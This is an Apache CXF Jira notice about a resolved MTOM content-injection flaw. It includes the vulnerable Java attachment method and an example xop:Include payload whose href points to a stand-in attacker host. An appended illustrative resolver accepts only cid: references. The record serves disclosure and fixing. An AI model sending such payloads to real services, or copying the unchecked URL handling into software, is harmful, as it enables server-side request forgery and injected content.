[ https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Andriy Redko resolved CXF-8706.
-------------------------------
    Resolution: Fixed

> CXF MTOM handler allows content injection
> -----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 4.0.0, 3.6.0, 3.5.5, 3.4.10
>
>
> When used with a SOAP web service or a JAXRS web service with MTOM enabled,
> the Unmarshaller allows the XOP Include tag to have href attributes that
> allow any protocol. According to the W3C MTOM spec, only "cid:" should be
> allowed for the href scheme.
>
> The affected call stack is:
>
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) line: 554
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
>     MTOMDecorator.startElement(TagName) line: 70
>
> The source code is:
>
>     public static DataSource getAttachmentDataSource(String contentId,
>                                                      Collection<Attachment> atts) {
>         // Is this right? - DD
>         if (contentId.startsWith("cid:")) {
>             try {
>                 contentId = URLDecoder.decode(contentId.substring(4),
>                                               StandardCharsets.UTF_8.name());
>             } catch (UnsupportedEncodingException ue) {
>                 contentId = contentId.substring(4);
>             }
>             return loadDataSource(contentId, atts);
>         } else if (contentId.indexOf("://") == -1) {
>             return loadDataSource(contentId, atts);
>         } else { // should only take cid for XOP
>             try {
>                 return new URLDataSource(new URL(contentId));
>             } catch (MalformedURLException e) {
>                 throw new Fault(e);
>             }
>         }
>     }
>
> The exploit can send a payload containing:
>
>     <stringvalue><inc:Include href="http://attackers.site/exploit/payload"
>         xmlns:inc="http://www.w3.org/2004/08/xop/include"/></stringvalue>

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
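As an added illustration of the rule the report asks for (it is not CXF's own code or its fix), the following stand-alone Java resolver accepts an xop:Include href only when it uses the cid: scheme and resolves it against the message's own MIME parts; any other scheme is rejected rather than fetched. The class name, the exception type and the Map-based attachment lookup are assumptions for this example.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Map;

// Added example, not CXF code: resolves xop:Include href values the way the
// W3C XOP spec requires, i.e. only "cid:" references into the MIME attachments.
public final class XopHrefResolver {

    /** Thrown when an href is not a cid: reference or names no attachment (assumed type). */
    public static final class UnsupportedXopHrefException extends RuntimeException {
        UnsupportedXopHrefException(String msg) { super(msg); }
    }

    /**
     * Returns the attachment body referenced by {@code href}.
     * Attachments are keyed by their Content-ID (without the angle brackets).
     * Schemes such as http:, https: or file: are refused here, so the resolver
     * never opens a URL chosen by the sender of the message.
     */
    public static byte[] resolve(String href, Map<String, byte[]> attachmentsByContentId) {
        // URI schemes are case-insensitive, so "CID:" is accepted as well.
        if (href == null || !href.regionMatches(true, 0, "cid:", 0, 4)) {
            throw new UnsupportedXopHrefException("xop:Include href must use the cid: scheme: " + href);
        }
        // The cid: part may be percent-encoded (e.g. %40 for '@'), as in the original code.
        String contentId = URLDecoder.decode(href.substring(4), StandardCharsets.UTF_8);
        byte[] body = attachmentsByContentId.get(contentId);
        if (body == null) {
            throw new UnsupportedXopHrefException("no attachment with Content-ID " + contentId);
        }
        return body;
    }

    public static void main(String[] args) {
        // Constructed sample attachment set, standing in for the parsed MIME parts.
        Map<String, byte[]> atts = Map.of("part1@example.org",
                                          "hello".getBytes(StandardCharsets.UTF_8));
        // A well-formed cid: reference is served from the attachments.
        System.out.println(new String(resolve("cid:part1%40example.org", atts),
                                      StandardCharsets.UTF_8));
        // A remote-scheme href like the one in the report is rejected, not fetched.
        try {
            resolve("http://attackers.site/exploit/payload", atts);
        } catch (UnsupportedXopHrefException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```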